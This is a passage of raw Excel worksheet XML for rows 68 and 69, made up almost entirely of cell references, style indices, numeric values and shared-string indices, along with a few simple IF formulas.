        <v>0</v>
      </c>
      <c r="ND68" s="119">
        <v>0</v>
      </c>
      <c r="NE68" s="117">
        <v>0</v>
      </c>
      <c r="NF68" s="118">
        <v>0</v>
      </c>
      <c r="NG68" s="507">
        <v>0</v>
      </c>
      <c r="NH68" s="119">
        <v>0</v>
      </c>
      <c r="NI68" s="119">
        <v>0</v>
      </c>
      <c r="NJ68" s="119">
        <v>0</v>
      </c>
      <c r="NK68" s="117">
        <v>0</v>
      </c>
      <c r="NL68" s="118">
        <v>0</v>
      </c>
      <c r="NM68" s="507">
        <v>0</v>
      </c>
      <c r="NN68" s="119">
        <v>0</v>
      </c>
      <c r="NO68" s="119">
        <v>0</v>
      </c>
      <c r="NP68" s="119">
        <v>0</v>
      </c>
      <c r="NQ68" s="117">
        <v>0</v>
      </c>
      <c r="NR68" s="118">
        <v>0</v>
      </c>
      <c r="NS68" s="507">
        <v>0</v>
      </c>
      <c r="NT68" s="119">
        <v>0</v>
      </c>
      <c r="NU68" s="119">
        <v>0</v>
      </c>
      <c r="NV68" s="119">
        <v>0</v>
      </c>
      <c r="NW68" s="117">
        <v>5276</v>
      </c>
      <c r="NX68" s="118" t="s">
        <v>4249</v>
      </c>
      <c r="NY68" s="507">
        <v>1</v>
      </c>
      <c r="NZ68" s="119" t="s">
        <v>3483</v>
      </c>
      <c r="OA68" s="119">
        <v>1</v>
      </c>
      <c r="OB68" s="119">
        <v>1</v>
      </c>
      <c r="OC68" s="120">
        <v>0</v>
      </c>
      <c r="OD68" s="120">
        <v>0</v>
      </c>
      <c r="OE68" s="120">
        <v>0</v>
      </c>
      <c r="OF68" s="121">
        <v>0</v>
      </c>
      <c r="OG68" s="120">
        <v>0</v>
      </c>
      <c r="OH68" s="120">
        <v>0</v>
      </c>
      <c r="OI68" s="120">
        <v>0</v>
      </c>
      <c r="OJ68" s="120">
        <v>0</v>
      </c>
      <c r="OK68" s="383"/>
      <c r="OL68" s="120">
        <v>0</v>
      </c>
      <c r="OM68" s="120">
        <v>0</v>
      </c>
      <c r="ON68" s="120">
        <v>0</v>
      </c>
      <c r="OO68" s="120"/>
      <c r="OP68" s="120">
        <v>0</v>
      </c>
      <c r="OQ68" s="464">
        <v>0</v>
      </c>
      <c r="OR68" s="120">
        <v>0</v>
      </c>
      <c r="OS68" s="120">
        <v>0</v>
      </c>
      <c r="OT68" s="120">
        <v>0</v>
      </c>
      <c r="OU68" s="120"/>
      <c r="OV68" s="120">
        <v>0</v>
      </c>
      <c r="OW68" s="464">
        <v>0</v>
      </c>
      <c r="OX68" s="120">
        <v>0</v>
      </c>
      <c r="OY68" s="120">
        <v>0</v>
      </c>
      <c r="OZ68" s="120">
        <v>0</v>
      </c>
      <c r="PA68" s="120"/>
      <c r="PB68" s="120">
        <v>0</v>
      </c>
      <c r="PC68" s="464">
        <v>0</v>
      </c>
      <c r="PD68" s="120">
        <v>0</v>
      </c>
      <c r="PE68" s="120">
        <v>0</v>
      </c>
      <c r="PF68" s="120">
        <v>0</v>
      </c>
      <c r="PG68" s="120"/>
      <c r="PH68" s="120">
        <v>0</v>
      </c>
      <c r="PI68" s="464">
        <v>0</v>
      </c>
      <c r="PJ68" s="120">
        <v>0</v>
      </c>
      <c r="PK68" s="120">
        <v>0</v>
      </c>
      <c r="PL68" s="120">
        <v>0</v>
      </c>
      <c r="PM68" s="120"/>
      <c r="PN68" s="120">
        <v>0</v>
      </c>
      <c r="PO68" s="464">
        <v>0</v>
      </c>
      <c r="PP68" s="120">
        <v>0</v>
      </c>
      <c r="PQ68" s="120">
        <v>0</v>
      </c>
      <c r="PR68" s="120">
        <v>0</v>
      </c>
      <c r="PS68" s="120"/>
      <c r="PT68" s="120">
        <v>0</v>
      </c>
      <c r="PU68" s="464">
        <v>0</v>
      </c>
      <c r="PV68" s="120">
        <v>0</v>
      </c>
      <c r="PW68" s="120">
        <v>0</v>
      </c>
      <c r="PX68" s="120">
        <v>0</v>
      </c>
      <c r="PY68" s="120"/>
      <c r="PZ68" s="120">
        <v>0</v>
      </c>
      <c r="QA68" s="464">
        <v>0</v>
      </c>
      <c r="QB68" s="120">
        <v>0</v>
      </c>
      <c r="QC68" s="120">
        <v>0</v>
      </c>
      <c r="QD68" s="120">
        <v>0</v>
      </c>
      <c r="QE68" s="120"/>
      <c r="QF68" s="120">
        <v>0</v>
      </c>
      <c r="QG68" s="464">
        <v>0</v>
      </c>
      <c r="QH68" s="120">
        <v>0</v>
      </c>
      <c r="QI68" s="120">
        <v>0</v>
      </c>
      <c r="QJ68" s="120">
        <v>0</v>
      </c>
      <c r="QK68" s="120"/>
      <c r="QL68" s="120">
        <v>0</v>
      </c>
      <c r="QM68" s="464">
        <v>0</v>
      </c>
      <c r="QN68" s="120">
        <v>0</v>
      </c>
      <c r="QO68" s="120">
        <v>0</v>
      </c>
      <c r="QP68" s="120">
        <v>0</v>
      </c>
      <c r="QQ68" s="120"/>
      <c r="QR68" s="120">
        <v>0</v>
      </c>
      <c r="QS68" s="464">
        <v>0</v>
      </c>
      <c r="QT68" s="184"/>
      <c r="QU68" s="184"/>
      <c r="QV68" s="184"/>
      <c r="QW68" s="184"/>
      <c r="QX68" s="184"/>
      <c r="QY68" s="184"/>
      <c r="QZ68" s="184"/>
      <c r="RA68" s="184"/>
      <c r="RB68" s="184"/>
      <c r="RC68" s="184"/>
      <c r="RD68" s="184"/>
      <c r="RE68" s="184"/>
      <c r="RF68" s="184"/>
      <c r="RG68" s="184"/>
      <c r="RH68" s="184"/>
      <c r="RI68" s="184"/>
      <c r="RJ68" s="184"/>
      <c r="RK68" s="184"/>
      <c r="RL68" s="184"/>
      <c r="RM68" s="184"/>
      <c r="RN68" s="184"/>
      <c r="RO68" s="184"/>
      <c r="RP68" s="184"/>
      <c r="RQ68" s="184"/>
      <c r="RR68" s="184"/>
      <c r="RS68" s="184"/>
      <c r="RT68" s="184"/>
      <c r="RU68" s="184"/>
      <c r="RV68" s="184"/>
      <c r="RW68" s="184"/>
      <c r="RX68" s="184"/>
      <c r="RY68" s="184"/>
      <c r="RZ68" s="184"/>
      <c r="SA68" s="184"/>
      <c r="SB68" s="184"/>
      <c r="SC68" s="184"/>
      <c r="SD68" s="184"/>
      <c r="SE68" s="184"/>
      <c r="SF68" s="184"/>
      <c r="SG68" s="184"/>
      <c r="SH68" s="184"/>
      <c r="SI68" s="184"/>
      <c r="SJ68" s="184"/>
      <c r="SK68" s="184"/>
      <c r="SL68" s="184"/>
      <c r="SM68" s="184"/>
      <c r="SN68" s="184"/>
      <c r="SO68" s="184"/>
      <c r="SP68" s="184"/>
      <c r="SQ68" s="184"/>
      <c r="SR68" s="184"/>
      <c r="SS68" s="184"/>
      <c r="ST68" s="184"/>
      <c r="SU68" s="184"/>
      <c r="SV68" s="184"/>
      <c r="SW68" s="184"/>
      <c r="SX68" s="184"/>
      <c r="SY68" s="184"/>
      <c r="SZ68" s="184"/>
      <c r="TA68" s="184"/>
      <c r="TB68" s="184"/>
      <c r="TC68" s="184"/>
      <c r="TD68" s="184"/>
      <c r="TE68" s="184"/>
      <c r="TF68" s="184"/>
      <c r="TG68" s="184"/>
      <c r="TH68" s="184"/>
      <c r="TI68" s="184"/>
      <c r="TJ68" s="184"/>
      <c r="TK68" s="184"/>
      <c r="TL68" s="184"/>
      <c r="TM68" s="184"/>
      <c r="TN68" s="184"/>
      <c r="TO68" s="184"/>
      <c r="TP68" s="184"/>
      <c r="TQ68" s="184"/>
      <c r="TR68" s="184"/>
      <c r="TS68" s="184"/>
      <c r="TT68" s="184"/>
      <c r="TU68" s="184"/>
      <c r="TV68" s="184"/>
      <c r="TW68" s="184"/>
      <c r="TX68" s="184"/>
      <c r="TY68" s="184"/>
      <c r="TZ68" s="184"/>
      <c r="UA68" s="184"/>
      <c r="UB68" s="184"/>
      <c r="UC68" s="184"/>
      <c r="UD68" s="184"/>
      <c r="UE68" s="184"/>
      <c r="UF68" s="184"/>
      <c r="UG68" s="184"/>
      <c r="UH68" s="184"/>
      <c r="UI68" s="184"/>
      <c r="UJ68" s="184"/>
      <c r="UK68" s="184"/>
      <c r="UL68" s="184"/>
      <c r="UM68" s="184"/>
      <c r="UN68" s="184"/>
      <c r="UO68" s="184"/>
      <c r="UP68" s="184"/>
      <c r="UQ68" s="184"/>
      <c r="UR68" s="184"/>
      <c r="US68" s="184"/>
      <c r="UT68" s="184"/>
      <c r="UU68" s="184"/>
      <c r="UV68" s="184"/>
      <c r="UW68" s="184"/>
      <c r="UX68" s="184"/>
      <c r="UY68" s="184"/>
      <c r="UZ68" s="184"/>
      <c r="VA68" s="184"/>
      <c r="VB68" s="184"/>
      <c r="VC68" s="184"/>
      <c r="VD68" s="184"/>
      <c r="VE68" s="184"/>
      <c r="VF68" s="184"/>
      <c r="VG68" s="184"/>
      <c r="VH68" s="184"/>
      <c r="VI68" s="184"/>
      <c r="VJ68" s="184"/>
      <c r="VK68" s="184"/>
      <c r="VL68" s="184"/>
      <c r="VM68" s="184"/>
      <c r="VN68" s="184"/>
      <c r="VO68" s="184"/>
      <c r="VP68" s="184"/>
      <c r="VQ68" s="184"/>
      <c r="VR68" s="184"/>
      <c r="VS68" s="184"/>
      <c r="VT68" s="184"/>
      <c r="VU68" s="184"/>
      <c r="VV68" s="184"/>
      <c r="VW68" s="184"/>
      <c r="VX68" s="184"/>
      <c r="VY68" s="184"/>
    </row>
    <row r="69" spans="1:597" ht="39.950000000000003" customHeight="1">
      <c r="A69" s="82" t="s">
        <v>107</v>
      </c>
      <c r="B69" s="83" t="s">
        <v>4</v>
      </c>
      <c r="C69" s="83" t="s">
        <v>466</v>
      </c>
      <c r="D69" s="83" t="s">
        <v>112</v>
      </c>
      <c r="E69" s="83">
        <f t="shared" ref="E69:E112" si="5">IF(F69=F68,E68,E68+1)</f>
        <v>47</v>
      </c>
      <c r="F69" s="83" t="s">
        <v>113</v>
      </c>
      <c r="G69" s="94" t="s">
        <v>1331</v>
      </c>
      <c r="H69" s="83" t="s">
        <v>1332</v>
      </c>
      <c r="I69" s="81" t="s">
        <v>1343</v>
      </c>
      <c r="J69" s="85" t="s">
        <v>1253</v>
      </c>
      <c r="K69" s="81" t="s">
        <v>880</v>
      </c>
      <c r="L69" s="81" t="s">
        <v>1353</v>
      </c>
      <c r="M69" s="378" t="s">
        <v>275</v>
      </c>
      <c r="N69" s="74" t="str">
        <f t="shared" si="3"/>
        <v>OK</v>
      </c>
      <c r="O69" s="485" t="str">
        <f t="shared" si="4"/>
        <v>CIC2018</v>
      </c>
      <c r="P69" s="91"/>
      <c r="Q69" s="379" t="s">
        <v>745</v>
      </c>
      <c r="R69" s="92" t="s">
        <v>1346</v>
      </c>
      <c r="S69" s="93" t="s">
        <v>843</v>
      </c>
      <c r="T69" s="92" t="s">
        <v>1347</v>
      </c>
      <c r="U69" s="94" t="s">
        <v>4</v>
      </c>
      <c r="V69" s="95" t="s">
        <v>751</v>
      </c>
      <c r="W69" s="96" t="s">
        <v>1320</v>
      </c>
      <c r="X69" s="97" t="s">
        <v>886</v>
      </c>
      <c r="Y69" s="83" t="s">
        <v>1352</v>
      </c>
      <c r="Z69" s="98" t="s">
        <v>1338</v>
      </c>
      <c r="AA69" s="182" t="s">
        <v>745</v>
      </c>
      <c r="AB69" s="183" t="s">
        <v>745</v>
      </c>
      <c r="AC69" s="302" t="s">
        <v>745</v>
      </c>
      <c r="AD69" s="83"/>
      <c r="AE69" s="83"/>
      <c r="AF69" s="384" t="s">
        <v>745</v>
      </c>
      <c r="AG69" s="88" t="s">
        <v>745</v>
      </c>
      <c r="AH69" s="341" t="s">
        <v>746</v>
      </c>
      <c r="AI69" s="353" t="s">
        <v>756</v>
      </c>
      <c r="AJ69" s="353" t="s">
        <v>747</v>
      </c>
      <c r="AK69" s="354" t="s">
        <v>745</v>
      </c>
      <c r="AL69" s="355" t="s">
        <v>747</v>
      </c>
      <c r="AM69" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AN69" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AO69" s="356" t="s">
        <v>747</v>
      </c>
      <c r="AP69" s="357" t="s">
        <v>745</v>
      </c>
      <c r="AQ69" s="646">
        <v>1473</v>
      </c>
      <c r="AR69" s="100"/>
      <c r="AS69" s="647">
        <v>1473</v>
      </c>
      <c r="AT69" s="647">
        <v>0</v>
      </c>
      <c r="AU69" s="647">
        <v>1473</v>
      </c>
      <c r="AV69" s="92" t="s">
        <v>4</v>
      </c>
      <c r="AW69" s="100">
        <v>1</v>
      </c>
      <c r="AX69" s="100">
        <v>1</v>
      </c>
      <c r="AY69" s="100">
        <v>0</v>
      </c>
      <c r="AZ69" s="100">
        <v>1</v>
      </c>
      <c r="BA69" s="381"/>
      <c r="BB69" s="101">
        <v>0</v>
      </c>
      <c r="BC69" s="102">
        <v>0</v>
      </c>
      <c r="BD69" s="102">
        <v>0</v>
      </c>
      <c r="BE69" s="103">
        <v>0</v>
      </c>
      <c r="BF69" s="103">
        <v>0</v>
      </c>
      <c r="BG69" s="104">
        <v>0</v>
      </c>
      <c r="BH69" s="105">
        <v>0</v>
      </c>
      <c r="BI69" s="106">
        <v>0</v>
      </c>
      <c r="BJ69" s="497">
        <v>0</v>
      </c>
      <c r="BK69" s="107">
        <v>0</v>
      </c>
      <c r="BL69" s="107">
        <v>0</v>
      </c>
      <c r="BM69" s="108">
        <v>0</v>
      </c>
      <c r="BN69" s="109">
        <v>0</v>
      </c>
      <c r="BO69" s="110">
        <v>0</v>
      </c>
      <c r="BP69" s="501">
        <v>0</v>
      </c>
      <c r="BQ69" s="111">
        <v>0</v>
      </c>
      <c r="BR69" s="111">
        <v>0</v>
      </c>
      <c r="BS69" s="112">
        <v>0</v>
      </c>
      <c r="BT69" s="113">
        <v>60</v>
      </c>
      <c r="BU69" s="114" t="s">
        <v>3488</v>
      </c>
      <c r="BV69" s="503">
        <v>10</v>
      </c>
      <c r="BW69" s="115" t="s">
        <v>1929</v>
      </c>
      <c r="BX69" s="115">
        <v>1</v>
      </c>
      <c r="BY69" s="116">
        <v>10</v>
      </c>
      <c r="BZ69" s="250">
        <v>20</v>
      </c>
      <c r="CA69" s="251" t="s">
        <v>1911</v>
      </c>
      <c r="CB69" s="505">
        <v>19</v>
      </c>
      <c r="CC69" s="252" t="s">
        <v>1910</v>
      </c>
      <c r="CD69" s="252">
        <v>1</v>
      </c>
      <c r="CE69" s="253">
        <v>19</v>
      </c>
      <c r="CF69" s="101">
        <v>80</v>
      </c>
      <c r="CG69" s="102" t="s">
        <v>3489</v>
      </c>
      <c r="CH69" s="102">
        <v>29</v>
      </c>
      <c r="CI69" s="103" t="s">
        <v>3486</v>
      </c>
      <c r="CJ69" s="103">
        <v>2</v>
      </c>
      <c r="CK69" s="104">
        <v>29</v>
      </c>
      <c r="CL69" s="105">
        <v>0</v>
      </c>
      <c r="CM69" s="106">
        <v>0</v>
      </c>
      <c r="CN69" s="497">
        <v>0</v>
      </c>
      <c r="CO69" s="107">
        <v>0</v>
      </c>
      <c r="CP69" s="107">
        <v>0</v>
      </c>
      <c r="CQ69" s="108">
        <v>0</v>
      </c>
      <c r="CR69" s="109">
        <v>4856</v>
      </c>
      <c r="CS69" s="110" t="s">
        <v>1955</v>
      </c>
      <c r="CT69" s="501">
        <v>10</v>
      </c>
      <c r="CU69" s="111" t="s">
        <v>1929</v>
      </c>
      <c r="CV69" s="111">
        <v>1</v>
      </c>
      <c r="CW69" s="112">
        <v>10</v>
      </c>
      <c r="CX69" s="113">
        <v>4856</v>
      </c>
      <c r="CY69" s="114" t="s">
        <v>1955</v>
      </c>
      <c r="CZ69" s="503">
        <v>10</v>
      </c>
      <c r="DA69" s="115" t="s">
        <v>1929</v>
      </c>
      <c r="DB69" s="115">
        <v>1</v>
      </c>
      <c r="DC69" s="116">
        <v>10</v>
      </c>
      <c r="DD69" s="101">
        <v>0</v>
      </c>
      <c r="DE69" s="102">
        <v>0</v>
      </c>
      <c r="DF69" s="102">
        <v>0</v>
      </c>
      <c r="DG69" s="103">
        <v>0</v>
      </c>
      <c r="DH69" s="103">
        <v>0</v>
      </c>
      <c r="DI69" s="104">
        <v>0</v>
      </c>
      <c r="DJ69" s="105">
        <v>0</v>
      </c>
      <c r="DK69" s="106">
        <v>0</v>
      </c>
      <c r="DL69" s="497">
        <v>0</v>
      </c>
      <c r="DM69" s="107">
        <v>0</v>
      </c>
      <c r="DN69" s="107">
        <v>0</v>
      </c>
      <c r="DO69" s="108">
        <v>0</v>
      </c>
      <c r="DP69" s="109">
        <v>0</v>
      </c>
      <c r="DQ69" s="110">
        <v>0</v>
      </c>
      <c r="DR69" s="501">
        <v>0</v>
      </c>
      <c r="DS69" s="111">
        <v>0</v>
      </c>
      <c r="DT69" s="111">
        <v>0</v>
      </c>
      <c r="DU69" s="112">
        <v>0</v>
      </c>
      <c r="DV69" s="113">
        <v>0</v>
      </c>
      <c r="DW69" s="114">
        <v>0</v>
      </c>
      <c r="DX69" s="503">
        <v>0</v>
      </c>
      <c r="DY69" s="115">
        <v>0</v>
      </c>
      <c r="DZ69" s="115">
        <v>0</v>
      </c>
      <c r="EA69" s="116">
        <v>0</v>
      </c>
      <c r="EB69" s="250">
        <v>0</v>
      </c>
      <c r="EC69" s="251">
        <v>0</v>
      </c>
      <c r="ED69" s="505">
        <v>0</v>
      </c>
      <c r="EE69" s="252">
        <v>0</v>
      </c>
      <c r="EF69" s="252">
        <v>0</v>
      </c>
      <c r="EG69" s="253">
        <v>0</v>
      </c>
      <c r="EH69" s="101">
        <v>0</v>
      </c>
      <c r="EI69" s="102">
        <v>0</v>
      </c>
      <c r="EJ69" s="102">
        <v>0</v>
      </c>
      <c r="EK69" s="103">
        <v>0</v>
      </c>
      <c r="EL69" s="103">
        <v>0</v>
      </c>
      <c r="EM69" s="104">
        <v>0</v>
      </c>
      <c r="EN69" s="105">
        <v>0</v>
      </c>
      <c r="EO69" s="106">
        <v>0</v>
      </c>
      <c r="EP69" s="497">
        <v>0</v>
      </c>
      <c r="EQ69" s="107">
        <v>0</v>
      </c>
      <c r="ER69" s="107">
        <v>0</v>
      </c>
      <c r="ES69" s="108">
        <v>0</v>
      </c>
      <c r="ET69" s="109">
        <v>0</v>
      </c>
      <c r="EU69" s="110">
        <v>0</v>
      </c>
      <c r="EV69" s="501">
        <v>0</v>
      </c>
      <c r="EW69" s="111">
        <v>0</v>
      </c>
      <c r="EX69" s="111">
        <v>0</v>
      </c>
      <c r="EY69" s="112">
        <v>0</v>
      </c>
      <c r="EZ69" s="113">
        <v>0</v>
      </c>
      <c r="FA69" s="114">
        <v>0</v>
      </c>
      <c r="FB69" s="503">
        <v>0</v>
      </c>
      <c r="FC69" s="115">
        <v>0</v>
      </c>
      <c r="FD69" s="115">
        <v>0</v>
      </c>
      <c r="FE69" s="116">
        <v>0</v>
      </c>
      <c r="FF69" s="101">
        <v>0</v>
      </c>
      <c r="FG69" s="102">
        <v>0</v>
      </c>
      <c r="FH69" s="102">
        <v>0</v>
      </c>
      <c r="FI69" s="103">
        <v>0</v>
      </c>
      <c r="FJ69" s="103">
        <v>0</v>
      </c>
      <c r="FK69" s="104">
        <v>0</v>
      </c>
      <c r="FL69" s="105">
        <v>0</v>
      </c>
      <c r="FM69" s="106">
        <v>0</v>
      </c>
      <c r="FN69" s="497">
        <v>0</v>
      </c>
      <c r="FO69" s="107">
        <v>0</v>
      </c>
      <c r="FP69" s="107">
        <v>0</v>
      </c>
      <c r="FQ69" s="108">
        <v>0</v>
      </c>
      <c r="FR69" s="109">
        <v>0</v>
      </c>
      <c r="FS69" s="110">
        <v>0</v>
      </c>
      <c r="FT69" s="501">
        <v>0</v>
      </c>
      <c r="FU69" s="111">
        <v>0</v>
      </c>
      <c r="FV69" s="111">
        <v>0</v>
      </c>
      <c r="FW69" s="112">
        <v>0</v>
      </c>
      <c r="FX69" s="113">
        <v>0</v>
      </c>
      <c r="FY69" s="114">
        <v>0</v>
      </c>
      <c r="FZ69" s="503">
        <v>0</v>
      </c>
      <c r="GA69" s="115">
        <v>0</v>
      </c>
      <c r="GB69" s="115">
        <v>0</v>
      </c>
      <c r="GC69" s="116">
        <v>0</v>
      </c>
      <c r="GD69" s="250">
        <v>20</v>
      </c>
      <c r="GE69" s="251" t="s">
        <v>1911</v>
      </c>
      <c r="GF69" s="505">
        <v>19</v>
      </c>
      <c r="GG69" s="252" t="s">
        <v>1910</v>
      </c>
      <c r="GH69" s="252">
        <v>1</v>
      </c>
      <c r="GI69" s="253">
        <v>19</v>
      </c>
      <c r="GJ69" s="101">
        <v>20</v>
      </c>
      <c r="GK69" s="102" t="s">
        <v>1911</v>
      </c>
      <c r="GL69" s="102">
        <v>19</v>
      </c>
      <c r="GM69" s="103" t="s">
        <v>1910</v>
      </c>
      <c r="GN69" s="103">
        <v>1</v>
      </c>
      <c r="GO69" s="104">
        <v>19</v>
      </c>
      <c r="GP69" s="105">
        <v>0</v>
      </c>
      <c r="GQ69" s="106">
        <v>0</v>
      </c>
      <c r="GR69" s="497">
        <v>0</v>
      </c>
      <c r="GS69" s="107">
        <v>0</v>
      </c>
      <c r="GT69" s="107">
        <v>0</v>
      </c>
      <c r="GU69" s="108">
        <v>0</v>
      </c>
      <c r="GV69" s="109">
        <v>0</v>
      </c>
      <c r="GW69" s="110">
        <v>0</v>
      </c>
      <c r="GX69" s="501">
        <v>0</v>
      </c>
      <c r="GY69" s="111">
        <v>0</v>
      </c>
      <c r="GZ69" s="111">
        <v>0</v>
      </c>
      <c r="HA69" s="112">
        <v>0</v>
      </c>
      <c r="HB69" s="113">
        <v>0</v>
      </c>
      <c r="HC69" s="114">
        <v>0</v>
      </c>
      <c r="HD69" s="503">
        <v>0</v>
      </c>
      <c r="HE69" s="115">
        <v>0</v>
      </c>
      <c r="HF69" s="115">
        <v>0</v>
      </c>
      <c r="HG69" s="116">
        <v>0</v>
      </c>
      <c r="HH69" s="101">
        <v>0</v>
      </c>
      <c r="HI69" s="102">
        <v>0</v>
      </c>
      <c r="HJ69" s="102">
        <v>0</v>
      </c>
      <c r="HK69" s="103">
        <v>0</v>
      </c>
      <c r="HL69" s="103">
        <v>0</v>
      </c>
      <c r="HM69" s="104">
        <v>0</v>
      </c>
      <c r="HN69" s="105">
        <v>0</v>
      </c>
      <c r="HO69" s="106">
        <v>0</v>
      </c>
      <c r="HP69" s="497">
        <v>0</v>
      </c>
      <c r="HQ69" s="107">
        <v>0</v>
      </c>
      <c r="HR69" s="107">
        <v>0</v>
      </c>
      <c r="HS69" s="108">
        <v>0</v>
      </c>
      <c r="HT69" s="109">
        <v>0</v>
      </c>
      <c r="HU69" s="110">
        <v>0</v>
      </c>
      <c r="HV69" s="501">
        <v>0</v>
      </c>
      <c r="HW69" s="111">
        <v>0</v>
      </c>
      <c r="HX69" s="111">
        <v>0</v>
      </c>
      <c r="HY69" s="112">
        <v>0</v>
      </c>
      <c r="HZ69" s="113">
        <v>60</v>
      </c>
      <c r="IA69" s="114" t="s">
        <v>3488</v>
      </c>
      <c r="IB69" s="503">
        <v>10</v>
      </c>
      <c r="IC69" s="115" t="s">
        <v>1929</v>
      </c>
      <c r="ID69" s="115">
        <v>1</v>
      </c>
      <c r="IE69" s="116">
        <v>10</v>
      </c>
      <c r="IF69" s="250">
        <v>0</v>
      </c>
      <c r="IG69" s="251">
        <v>0</v>
      </c>
      <c r="IH69" s="505">
        <v>0</v>
      </c>
      <c r="II69" s="252">
        <v>0</v>
      </c>
      <c r="IJ69" s="252">
        <v>0</v>
      </c>
      <c r="IK69" s="253">
        <v>0</v>
      </c>
      <c r="IL69" s="101">
        <v>60</v>
      </c>
      <c r="IM69" s="102" t="s">
        <v>3488</v>
      </c>
      <c r="IN69" s="102">
        <v>10</v>
      </c>
      <c r="IO69" s="103" t="s">
        <v>1929</v>
      </c>
      <c r="IP69" s="103">
        <v>1</v>
      </c>
      <c r="IQ69" s="104">
        <v>10</v>
      </c>
      <c r="IR69" s="105">
        <v>0</v>
      </c>
      <c r="IS69" s="106">
        <v>0</v>
      </c>
      <c r="IT69" s="497">
        <v>0</v>
      </c>
      <c r="IU69" s="107">
        <v>0</v>
      </c>
      <c r="IV69" s="107">
        <v>0</v>
      </c>
      <c r="IW69" s="108">
        <v>0</v>
      </c>
      <c r="IX69" s="109">
        <v>4856</v>
      </c>
      <c r="IY69" s="110" t="s">
        <v>1955</v>
      </c>
      <c r="IZ69" s="501">
        <v>10</v>
      </c>
      <c r="JA69" s="111" t="s">
        <v>1929</v>
      </c>
      <c r="JB69" s="111">
        <v>1</v>
      </c>
      <c r="JC69" s="112">
        <v>10</v>
      </c>
      <c r="JD69" s="113">
        <v>4856</v>
      </c>
      <c r="JE69" s="114" t="s">
        <v>1955</v>
      </c>
      <c r="JF69" s="503">
        <v>10</v>
      </c>
      <c r="JG69" s="115" t="s">
        <v>1929</v>
      </c>
      <c r="JH69" s="115">
        <v>1</v>
      </c>
      <c r="JI69" s="116">
        <v>10</v>
      </c>
      <c r="JJ69" s="101">
        <v>0</v>
      </c>
      <c r="JK69" s="102">
        <v>0</v>
      </c>
      <c r="JL69" s="102">
        <v>0</v>
      </c>
      <c r="JM69" s="103">
        <v>0</v>
      </c>
      <c r="JN69" s="103">
        <v>0</v>
      </c>
      <c r="JO69" s="104">
        <v>0</v>
      </c>
      <c r="JP69" s="105">
        <v>0</v>
      </c>
      <c r="JQ69" s="106">
        <v>0</v>
      </c>
      <c r="JR69" s="497">
        <v>0</v>
      </c>
      <c r="JS69" s="107">
        <v>0</v>
      </c>
      <c r="JT69" s="107">
        <v>0</v>
      </c>
      <c r="JU69" s="108">
        <v>0</v>
      </c>
      <c r="JV69" s="109">
        <v>0</v>
      </c>
      <c r="JW69" s="110">
        <v>0</v>
      </c>
      <c r="JX69" s="501">
        <v>0</v>
      </c>
      <c r="JY69" s="111">
        <v>0</v>
      </c>
      <c r="JZ69" s="111">
        <v>0</v>
      </c>
      <c r="KA69" s="112">
        <v>0</v>
      </c>
      <c r="KB69" s="113">
        <v>0</v>
      </c>
      <c r="KC69" s="114">
        <v>0</v>
      </c>
      <c r="KD69" s="503">
        <v>0</v>
      </c>
      <c r="KE69" s="115">
        <v>0</v>
      </c>
      <c r="KF69" s="115">
        <v>0</v>
      </c>
      <c r="KG69" s="116">
        <v>0</v>
      </c>
      <c r="KH69" s="250">
        <v>0</v>
      </c>
      <c r="KI69" s="251">
        <v>0</v>
      </c>
      <c r="KJ69" s="505">
        <v>0</v>
      </c>
      <c r="KK69" s="252">
        <v>0</v>
      </c>
      <c r="KL69" s="252">
        <v>0</v>
      </c>
      <c r="KM69" s="253">
        <v>0</v>
      </c>
      <c r="KN69" s="101">
        <v>0</v>
      </c>
      <c r="KO69" s="102">
        <v>0</v>
      </c>
      <c r="KP69" s="102">
        <v>0</v>
      </c>
      <c r="KQ69" s="103">
        <v>0</v>
      </c>
      <c r="KR69" s="103">
        <v>0</v>
      </c>
      <c r="KS69" s="104">
        <v>0</v>
      </c>
      <c r="KT69" s="105">
        <v>0</v>
      </c>
      <c r="KU69" s="106">
        <v>0</v>
      </c>
      <c r="KV69" s="497">
        <v>0</v>
      </c>
      <c r="KW69" s="107">
        <v>0</v>
      </c>
      <c r="KX69" s="107">
        <v>0</v>
      </c>
      <c r="KY69" s="108">
        <v>0</v>
      </c>
      <c r="KZ69" s="109">
        <v>0</v>
      </c>
      <c r="LA69" s="110">
        <v>0</v>
      </c>
      <c r="LB69" s="501">
        <v>0</v>
      </c>
      <c r="LC69" s="111">
        <v>0</v>
      </c>
      <c r="LD69" s="111">
        <v>0</v>
      </c>
      <c r="LE69" s="112">
        <v>0</v>
      </c>
      <c r="LF69" s="113">
        <v>0</v>
      </c>
      <c r="LG69" s="114">
        <v>0</v>
      </c>
      <c r="LH69" s="503">
        <v>0</v>
      </c>
      <c r="LI69" s="115">
        <v>0</v>
      </c>
      <c r="LJ69" s="115">
        <v>0</v>
      </c>
      <c r="LK69" s="116">
        <v>0</v>
      </c>
      <c r="LL69" s="117">
        <v>4856</v>
      </c>
      <c r="LM69" s="507">
        <v>1</v>
      </c>
      <c r="LN69" s="119">
        <v>0</v>
      </c>
      <c r="LO69" s="119">
        <v>1</v>
      </c>
      <c r="LP69" s="119">
        <v>1</v>
      </c>
      <c r="LQ69" s="119">
        <v>0</v>
      </c>
      <c r="LR69" s="119">
        <v>1</v>
      </c>
      <c r="LS69" s="119">
        <v>1</v>
      </c>
      <c r="LT69" s="382"/>
      <c r="LU69" s="117">
        <v>0</v>
      </c>
      <c r="LV69" s="118">
        <v>0</v>
      </c>
      <c r="LW69" s="507">
        <v>0</v>
      </c>
      <c r="LX69" s="119">
        <v>0</v>
      </c>
      <c r="LY69" s="119">
        <v>0</v>
      </c>
      <c r="LZ69" s="119">
        <v>0</v>
      </c>
      <c r="MA69" s="117">
        <v>0</v>
      </c>
      <c r="MB69" s="118">
        <v>0</v>
      </c>
      <c r="MC69" s="507">
        <v>0</v>
      </c>
      <c r="MD69" s="119">
        <v>0</v>
      </c>
      <c r="ME69" s="119">
        <v>0</v>
      </c>
      <c r="MF69" s="119">
        <v>0</v>
      </c>
      <c r="MG69" s="117">
        <v>0</v>
      </c>
      <c r="MH69" s="118">
        <v>0</v>
      </c>
      <c r="MI69" s="507">
        <v>0</v>
      </c>
      <c r="MJ69" s="119">
        <v>0</v>
      </c>
      <c r="MK69" s="119">
        <v>0</v>
      </c>
      <c r="ML69" s="119">
        <v>0</v>
      </c>
      <c r="MM69" s="117">
        <v>0</v>
      </c>
      <c r="MN69" s="118">
        <v>0</v>
      </c>
      <c r="MO69" s="507">
        <v>0</v>
      </c>
      <c r="MP69" s="119">
        <v>0</v>
      </c>
      <c r="MQ69" s="119">
